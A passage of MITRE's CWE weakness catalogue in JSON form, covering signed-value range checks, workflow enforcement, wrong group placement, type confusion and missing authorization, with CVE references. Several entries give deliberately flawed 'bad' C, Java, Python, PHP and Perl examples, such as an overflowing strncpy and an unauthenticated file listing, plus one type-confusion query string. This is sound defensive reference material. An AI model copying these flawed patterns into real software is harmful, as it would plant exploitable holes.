int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s &gt; 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index &lt; len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index &gt;= 0 &amp;&amp; index &lt; len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"Intro_Text":"The following code shows a simple BankAccount class with deposit and withdraw methods.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final int MAXIMUM_WITHDRAWAL_LIMIT = 350;private double accountBalance;public BankAccount() {}public void deposit(double depositAmount) {...}public void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// variable for bank account balance","// constructor for BankAccount","// method to deposit amount into BankAccount","// method to withdraw amount from BankAccount","// other methods for accessing the BankAccount object"],"xhtml:div":[{"#text":"accountBalance = 0;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (withdrawAmount &lt; MAXIMUM_WITHDRAWAL_LIMIT) {}else {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance;","xhtml:br":["",""]}},{"#text":"System.err.println(\\"Withdrawal amount exceeds the maximum limit allowed, please try again...\\");...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final int MINIMUM_WITHDRAWAL_LIMIT = 0;public final int MAXIMUM_WITHDRAWAL_LIMIT = 350;...public void withdraw(double withdrawAmount) {","xhtml:br":["","","","","","",""],"xhtml:i":"// method to withdraw amount from BankAccount","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (withdrawAmount &lt; MAXIMUM_WITHDRAWAL_LIMIT &amp;&amp;withdrawAmount &gt; MINIMUM_WITHDRAWAL_LIMIT) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":""}}}}}}}}],"Body_Text":["The withdraw method includes a check to ensure that the withdrawal amount does not exceed the maximum limit allowed, however the method does not check to ensure that the withdrawal amount is greater than a minimum value (CWE-129). Performing a range check on a value that does not include a minimum check can have significant security implications, in this case not including a minimum range check can allow a negative value to be used which would cause the financial application using this class to deposit money into the user account rather than withdrawing. In this example the if statement should the modified to include a minimum range check, as shown below.","Note that this example does not protect against concurrent access to the BankAccount balance variable, see CWE-413 and CWE-362.","While it is out of scope for this example, note that the use of doubles or floats in financial calculations may be subject to certain kinds of attacks where attackers use rounding errors to steal money."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-1866","Description":"Chain: integer overflow causes a negative signed value, which later bypasses a maximum-only check, leading to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1866"},{"Reference":"CVE-2009-1099","Description":"Chain: 16-bit counter can be interpreted as a negative value, compared to a 32-bit maximum value, leading to buffer under-write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1099"},{"Reference":"CVE-2011-0521","Description":"Chain: kernel\'s lack of a check for a negative value leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0521"},{"Reference":"CVE-2010-3704","Description":"Chain: parser uses atoi() but does not check for a negative value, which can happen on some platforms, leading to buffer under-write.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3704"},{"Reference":"CVE-2010-2530","Description":"Chain: Negative value stored in an int bypasses a size check and causes allocation of large amounts of memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2530"},{"Reference":"CVE-2009-3080","Description":"Chain: negative offset value to IOCTL bypasses check for maximum index, then used as an array index for buffer under-read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080"},{"Reference":"CVE-2008-6393","Description":"chain: file transfer client performs signed comparison, leading to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6393"},{"Reference":"CVE-2008-4558","Description":"chain: negative ID in media player bypasses check for maximum index, then used as an array index for buffer under-read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4558"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Type Conversion Vulnerabilities&#34; Page 246"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Comparisons&#34;, Page 265"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"}]}},"841":{"attr":{"@_ID":"841","@_Name":"Improper Enforcement of Behavioral Workflow","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.","Extended_Description":{"xhtml:p":["By performing actions in an unexpected order, or by omitting steps, an attacker could manipulate the business logic of the software or cause it to enter an invalid state. In some cases, this can also expose resultant weaknesses.","For example, a file-sharing protocol might require that an actor perform separate steps to provide a username, then a password, before being able to transfer files. If the file-sharing server accepts a password command followed by a transfer command, without any username being provided, the software might still perform the transfer.","Note that this is different than CWE-696, which focuses on when the software performs actions in the wrong sequence; this entry is closely related, but it is focused on ensuring that the actor performs actions in the correct sequence.","Workflow-related behaviors include:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Steps are performed in the expected order.","Required steps are not omitted.","Steps are not interrupted.","Steps are performed in a timely fashion."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"An attacker could cause the software to skip critical steps or perform them in the wrong order, bypassing its intended business logic. This can sometimes have security implications."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code is part of an FTP server and deals with various commands that could be sent by a user. It is intended that a user must successfully login before performing any other action such as retrieving or listing files.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def dispatchCommand(command, user, args):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if command == \'Login\':if command == \'Retrieve_file\':if command == \'List_files\':","xhtml:div":[{"#text":"loginUser(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"if authenticated(user) and ownsFile(user,args):sendFile(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"listFiles(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","","","","",""],"xhtml:i":["# user has requested a file","..."]}}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def dispatchCommand(command, user, args):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if command == \'List_files\':","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"if authenticated(user) and ownsDirectory(user,args):","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listFiles(args)return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}}],"Body_Text":["The server correctly does not send files to a user that isn\'t logged in and doesnt own the file. However, the server will incorrectly list the files in any directory without confirming the command came from an authenticated user, and that the user is authorized to see the directory\'s contents.","Here is a fixed version of the above example:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-0348","Description":"Bypass of access/billing restrictions by sending traffic to an unrestricted destination before sending to a restricted destination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0348"},{"Reference":"CVE-2007-3012","Description":"Attacker can access portions of a restricted page by canceling out of a dialog.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3012"},{"Reference":"CVE-2009-5056","Description":"Ticket-tracking system does not enforce a permission setting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5056"},{"Reference":"CVE-2004-2164","Description":"Shopping cart does not close a database connection when user restores a previous order, leading to connection exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2164"},{"Reference":"CVE-2003-0777","Description":"Chain: product does not properly handle dropped connections, leading to missing NULL terminator (CWE-170) and segmentation fault.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0777"},{"Reference":"CVE-2005-3327","Description":"Chain: Authentication bypass by skipping the first startup step as required by the protocol.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3327"},{"Reference":"CVE-2004-0829","Description":"Chain: File server crashes when sent a \\"find next\\" request without an initial \\"find first.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0829"},{"Reference":"CVE-2010-2620","Description":"FTP server allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2620"},{"Reference":"CVE-2005-3296","Description":"FTP server allows remote attackers to list arbitrary directories as root by running the LIST command before logging in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3296"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":40,"Entry_Name":"Insufficient Process Validation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-795"}},{"attr":{"@_External_Reference_ID":"REF-796"}},{"attr":{"@_External_Reference_ID":"REF-797"}},{"attr":{"@_External_Reference_ID":"REF-806"}},{"attr":{"@_External_Reference_ID":"REF-799"}},{"attr":{"@_External_Reference_ID":"REF-667"}},{"attr":{"@_External_Reference_ID":"REF-801"}},{"attr":{"@_External_Reference_ID":"REF-802","@_Section":"pages 29 - 41"}}]},"Notes":{"Note":{"attr":{"@_Type":"Research Gap"},"xhtml:p":["This weakness is typically associated with business logic flaws, except when it produces resultant weaknesses.","The classification of business logic flaws has been under-studied, although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles.","Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors, which are not as well-represented in CWE as weaknesses related to input validation, memory management, etc."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"842":{"attr":{"@_ID":"842","@_Name":"Placement of User into Incorrect Group","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software or the administrator places a user into an incorrect group.","Extended_Description":"If the incorrect group has more access or privileges than the intended group, the user might be able to bypass intended security policy to access unexpected resources or perform unexpected actions. The access-control system might not be able to detect malicious usage of this group membership.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"286","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1193","Description":"Operating system assigns user to privileged wheel group, allowing the user to gain root privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2010-3716","Description":"Chain: drafted web request allows the creation of users with arbitrary group membership.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3716"},{"Reference":"CVE-2008-5397","Description":"Chain: improper processing of configuration options causes users to contain unintended group memberships.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5397"},{"Reference":"CVE-2007-6644","Description":"CMS does not prevent remote administrators from promoting other users to the administrator group, in violation of the intended security model.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6644"},{"Reference":"CVE-2007-3260","Description":"Product assigns members to the root group, allowing escalation of privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3260"},{"Reference":"CVE-2002-0080","Description":"Chain: daemon does not properly clear groups before dropping privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0080"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-03-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"843":{"attr":{"@_ID":"843","@_Name":"Access of Resource Using Incompatible Type (\'Type Confusion\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.","Extended_Description":{"xhtml:p":["When the program accesses the resource using an incompatible type, this could trigger logical errors because the resource does not have expected properties. In languages without memory safety, such as C and C++, type confusion can lead to out-of-bounds memory access.","While this weakness is frequently associated with unions when parsing data with many different embedded object types in C, it can be present in any application that can interpret the same variable or memory location in multiple ways.","This weakness is not unique to C and C++. For example, errors in PHP applications can be triggered by providing array parameters when scalars are expected, or vice versa. Languages such as Perl, which perform automatic conversion of a variable of one type when it is accessed as if it were another type, can also contain these issues."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Object Type Confusion"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"When a memory buffer is accessed using the wrong type, it could read or write memory out of the bounds of the buffer, if the allocated buffer is smaller than the type that the code is attempting to access, leading to a crash and possibly code execution."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses a union to support the representation of different types of messages. It formats messages differently, depending on their type.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define NAME_TYPE 1#define ID_TYPE 2struct MessageBuffer{};int main (int argc, char **argv) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"int msgType;union {};","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"char *name;int nameID;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct MessageBuffer buf;char *defaultMessage = \\"Hello World\\";buf.msgType = NAME_TYPE;buf.name = defaultMessage;printf(\\"Pointer of buf.name is %p\\\\n\\", buf.name);buf.nameID = (int)(defaultMessage + 1);printf(\\"Pointer of buf.name is now %p\\\\n\\", buf.name);if (buf.msgType == NAME_TYPE) {}else {}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":"/* This particular value for nameID is used to make the code architecture-independent. If coming from untrusted input, it could be any value. */","xhtml:div":[{"#text":"printf(\\"Message: %s\\\\n\\", buf.name);","attr":{"@_style":"margin-left:10px;"}},{"#text":"printf(\\"Message: Use ID %d\\\\n\\", buf.nameID);","attr":{"@_style":"margin-left:10px;"}}]}}]}},"Body_Text":["The code intends to process the message as a NAME_TYPE, and sets the default message to \\"Hello World.\\" However, since both buf.name and buf.nameID are part of the same union, they can act as aliases for the same memory location, depending on memory layout after compilation.","As a result, modification of buf.nameID - an int - can effectively modify the pointer that is stored in buf.name - a string.","Execution of the program might generate output such as:",{"xhtml:div":{"xhtml:div":["Pointer of name is 10830","Pointer of name is now 10831","Message: ello World"]}},"Notice how the pointer for buf.name was changed, even though buf.name was not explicitly modified.","In this case, the first \\"H\\" character of the message is omitted. However, if an attacker is able to fully control the value of buf.nameID, then buf.name could contain an arbitrary pointer, leading to out-of-bounds reads or writes."]},{"Intro_Text":"The following PHP code accepts a value, adds 5, and prints the sum.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$value = $_GET[\'value\'];$sum = $value + 5;echo \\"value parameter is \'$value\'&lt;p&gt;\\";echo \\"SUM is $sum\\";","xhtml:br":["","",""]}},"Body_Text":["When called with the following query string:",{"xhtml:div":{"xhtml:div":"value=123"}},"the program calculates the sum and prints out:",{"xhtml:div":{"xhtml:div":"SUM is 128"}},"However, the attacker could supply a query string such as:",{"xhtml:div":{"xhtml:div":"value[]=123"}},"The \\"[]\\" array syntax causes $value to be treated as an array type, which then generates a fatal error when calculating $sum:",{"xhtml:div":{"xhtml:div":"Fatal error: Unsupported operand types in program.php on line 2"}}]},{"Intro_Text":"The following Perl code is intended to look up the privileges for user ID\'s between 0 and 3, by performing an access of the $UserPrivilegeArray reference. It is expected that only userID 3 is an admin (since this is listed in the third element of the array).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $UserPrivilegeArray = [\\"user\\", \\"user\\", \\"admin\\", \\"user\\"];my $userID = get_current_user_ID();if ($UserPrivilegeArray eq \\"user\\") {}else {}print \\"\\\\$UserPrivilegeArray = $UserPrivilegeArray\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"print \\"Regular user!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Admin!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":["In this case, the programmer intended to use \\"$UserPrivilegeArray-&gt;{$userID}\\" to access the proper position in the array. But because the subscript was omitted, the \\"user\\" string was compared to the scalar representation of the $UserPrivilegeArray reference, which might be of the form \\"ARRAY(0x229e8)\\" or similar.","Since the logic also \\"fails open\\" (CWE-636), the result of this bug is that all users are assigned administrator privileges.","While this is a forced example, it demonstrates how type confusion can have security consequences, even in memory-safe languages."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4577","Description":"Type confusion in CSS sequence leads to out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4577"},{"Reference":"CVE-2011-0611","Description":"Size inconsistency allows code execution, first discovered when it was actively exploited in-the-wild.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611"},{"Reference":"CVE-2010-0258","Description":"Improperly-parsed file containing records of different types leads to code execution when a memory location is interpreted as a different object than intended.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0258"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Exact"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-811","@_Section":"&#34;Type Confusion Vulnerabilities,&#34; page 59"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Type Confusion&#34;, Page 319"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any type-unsafe programming language."},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Type confusion weaknesses have received some attention by applied researchers and major software vendors for C and C++ code. Some publicly-reported vulnerabilities probably have type confusion as a root-cause weakness, but these may be described as \\"memory corruption\\" instead. This weakness seems likely to gain prominence in upcoming years.","For other languages, there are very few public reports of type confusion weaknesses. These are probably under-studied. Since many programs rely directly or indirectly on loose typing, a potential \\"type confusion\\" behavior might be intentional, possibly requiring more manual analysis."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Relationships"}]}},"862":{"attr":{"@_ID":"862","@_Name":"Missing Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not perform an authorization check when an actor attempts to access a resource or perform an action.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are not applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":{"xhtml:p":["OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.","Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."]}},{"Phase":"Implementation","Note":"A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to read the data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an authorization check; an automated 